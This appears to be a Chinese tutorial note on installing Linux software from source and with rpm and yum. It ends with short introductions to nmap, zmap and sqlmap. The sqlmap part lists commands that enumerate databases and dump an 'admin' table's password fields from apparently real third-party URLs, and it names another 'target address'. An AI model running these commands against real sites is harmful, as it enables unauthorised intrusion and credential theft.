环境部署安装:
三种不同的安装方式(推荐使用yum当没有网络时推荐使用rpm或者源码安装
Ubuntu中使用apt也可)
一.Linux源码安装
1、解压源码包文件
源码包通常会使用tar工具归档然后使用gunzip或bzip2进行压缩,后缀格式会分别为.tar.gz与.tar.bz2,分别的解压方式:
tar -zxvf FileName.tar.gz
tar -jxvf FileName.tar.bz2
\
tar 对文件进行压缩或解压 tar [参数] [文件]
-c 压缩文件
-x 解压文件
-t 查看压缩包内有哪些文件
-z 用Gzip压缩或解压
-j 用bzip2压缩或解压
-v 显示压缩或解压过程信息
-f 目标文件名
-P 保留原始权限和属性
-p 使用绝对路径压缩
-C 指定解压到的目录
\
2、切换到解压后的目录
cd FileDirectory
\
3、准备编译工作
在开始安装服务之前,需要执行configure脚本,会自动的对当前系统进行一系列的评估,如源文件、软件依赖库、编译器、
汇编器、连接器检查等等,如果有需要,还可以使用-prefix参数来指定程序的安装路径,而当脚本检查系统环境符合要求后,
则会在当前目录下生成一个Makefile文件。
./configure -prefix=/usr/local/program
\
4、生成安装程序
上步生成的Makefile文件会保存有系统环境依赖关系的安装规则,接下来需要使用make命令来根据Makefile文件提供
的规则使用合适的SHELL来编译所有依赖的源码,然后make命令会生成一个最终可执行的安装程序。
make
\
5、安装服务程序
如果在configure脚本阶段中没有使用-prefix参数,那么程序一般会被默认安装到/usr/local/bin目录中。
make install
6、清理临时文件(可选):
make clean
\
7、卸载服务程序命令(需要才执行)
make uninstall
\
8、查看安装信息
whereis
命令定位可执行文件、源代码文件、帮助文件在文件系统中的位置。这些文件的属性应属于原始代码,二进制文件,或是帮助文件。
whereis [-bmsu] [BMS 目录名 -f ] 文件名
-b 搜索文件的二进制部分。
-m 搜索文件的手册部分。
-s 搜索文件的源部分。
-u 没有说明文档的文件
-B、-M 和 -S 标志可以用于更改或限制 whereis
命令搜索的位置。由于该程序为了运行得更快而使用了 chdir 子例程,所以用
-M、-S 和 -B 标志目录列表给出的路径名必须是完整的;例如,它们必须以一个
/ (斜杠)开始。
-B 与 -b 一样,但是添加了要搜索的目录。更改或限制 whereis
命令搜索二进制文件的位置。
-M 与 -m 一样,但是添加了要搜索的目录。更改或限定 whereis
命令搜索手册部分的位置。
-S 与 -s 一样,但是添加了要搜索的目录。更改或限定 whereis
命令搜索源的位置。
-f 终止最后的 -M、-S 或 -B 目录列表并发文件名起始位置信号。
\
源码包安装会比RPM包安装慢,是因为RPM的软件包是根据特定系统和平台而指定的,经常一种程序会提供很多RPM包
的格式,用户根据系统情况选择适合的RPM包直接安装,而源码包相当于通用型,可以是用于多个系统中,所以需要
运行configure脚本来检测环境,生成对应的安装信息。
二:RPM包安装
rpm [选项] [参数]
-a:查询所有软件包
-e:删除指定的软件包
-f\<文件\>:查询拥有指定文件的套件;
-h或--hash:显示进度信息
-i:显示包的详细信息
-i\<软件包\>或--install\<软件包\>:安装指定的软件包
-l:显示包的文件列表
-p:查询指定的RPM包
-q:使用询问模式
-U\<软件包\>或--upgrade\<软件包\>:升级指定的程序包
-v:显示指令执行过程;
-vv:详细显示指令执行过程,便于排错。
\
常用命令组合:
-ivh:安装显示安装进度--install--verbose--hash
-Uvh:升级软件包--Update;
-qpl: 列出RPM软件包内的文件信息[Query Package list];
-qpi:列出RPM软件包的描述信息[Query Package install package(s)];
-qf:查找指定文件属于哪个RPM软件包[Query File];
-Va:校验所有的 RPM软件包,查找丢失的文件[View Lost];
-e:删除包
--force 强制操作 如强制删除等;
--requires 显示该包的依赖关系;
--nodeps 忽略依赖关系并继续操作
1、安装
rpm -i 需要安装的包文件
rpm -iv 需要安装的包文件(显示安装详情)
rpm -ivh 需要安装的包文件(显示安装详情及进度)
\
2、升级
rpm -U 需要升级的包文件
rpm -Uvh 需要升级的包文件(显示升级详情及进度)
\
3、卸载
rpm -e 需要卸载的软件包
注:如果其他程序依赖要卸载的包,系统会提示不能删除,若需要强行删除加上–nodeps,会强制删除,但可能导致
依赖于它的软件不能运行。
4、查看已安装
rpm -qa
5、查看指定包
rpm -qa | grep "软件或者包的名字"
\
三、yum安装
1、安装
yum install 软件
\
2、升级
yum update 软件
\
3、删除
yum remove 软件
4、查看
yum info 软件
5、搜索软件
yum search 软件
\
6、查看依赖关系
yum deplist 软件
7、查看已安装软件
yum list installded
yum 命令参数列表:
-e 静默执行
-t 忽略错误
-R[分钟] 设置等待时间
-y 自动应答yes
–skip-broken 忽略依赖问题
–nogpgcheck 忽略GPG验证
\
check-update 检查可更新的包
clean all 清除全部
clean packages 清除临时包文件(/var/cache/yum 下文件)
clean headers 清除rpm头文件
clean oldheaders 清除旧的rpm头文件
deplist 列出包的依赖
list 可安装和可更新的RPM包
list installed 已安装的包
list extras 已安装且不在资源库的包
info 可安装和可更新的RPM包 信息
info installed 已安装包的信息(-qa 参数相似)
install[RPM包] 安装包
localinstall 安装本地的 RPM包
update[RPM包] 更新包
upgrade 升级系统
search[关键词] 搜索包
provides[关键词] 搜索特定包文件名
reinstall[RPM包] 重新安装包
repolist 显示资源库的配置
resolvedep 指定依赖
remove[RPM包] 卸载包
\
sqlmap与nmap与zmap的使用与安装
一、Nmap的安装:
nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称
fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,nmap
也是不少黑客及骇客(又称脚本小子)爱用的工具
。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。
\
Nmap 常被跟评估系统漏洞软件混为一谈。Nmap
以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。(来源百度百科)
nmap的详细使用方法:
1.-sL(列表描述)
该命令仅仅列出指定网络上的每台主机的,不会向目标主机发送任何报文。端口扫描、操作系统探测或者ping扫描,在该命令下不会被执行。
当主机存活时:
2.-sP(Ping扫描) {style=“margin: 20px 0px; padding: 0px; font-size: 21px; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255);”}
该选项告诉Nmap仅仅 进行ping扫描
(主机发现),然后打印出对扫描做出响应的那些主机。
选项在默认情况下, 发送一个ICMP回声请求和一个TCP报文到80端口。
3.-P0(无ping) {style=“margin: 20px 0px; padding: 0px; font-size: 21px; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255);”}
用-P0选项会使Nmap对每一个指定的目标IP地址进行所要求的扫描。所以如果在命令行指定一个B类目标地址空间(/16),
所有 65,536个IP地址都会被扫描。
剩余详情参考(
https://www.cnblogs.com/justn0w/articles/10177612.html)
\
zmap使用笔记
zmap, 一个网络端口开放性的快速扫描工具。(
https://blog.csdn.net/zahuopuboss/article/details/53244281)
\
sqlmap
sqlmap是一个非常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦。我们要了解这些语句。如下:
检查注入点:
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11
爆所有数据库信息:
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs
爆当前数据库信息:
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --current-db
指定库名列出所有表
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables# ‘vhost48330’ 为指定数据库名称
指定库名表名列出所有字段
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns# ‘admin’ 为指定表名称
指定库名表名字段dump出指定字段
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump# ‘ac,id,password’ 为指定字段名称
\
目标地址:http://www.any.com/wcms/show.php?id=33
具体实操推荐(
https://blog.csdn.net/w1304099880/article/details/102759432)
\
\
高级软件管理器
https://www.cnblogs.com/dreamtrue13/p/6693533.html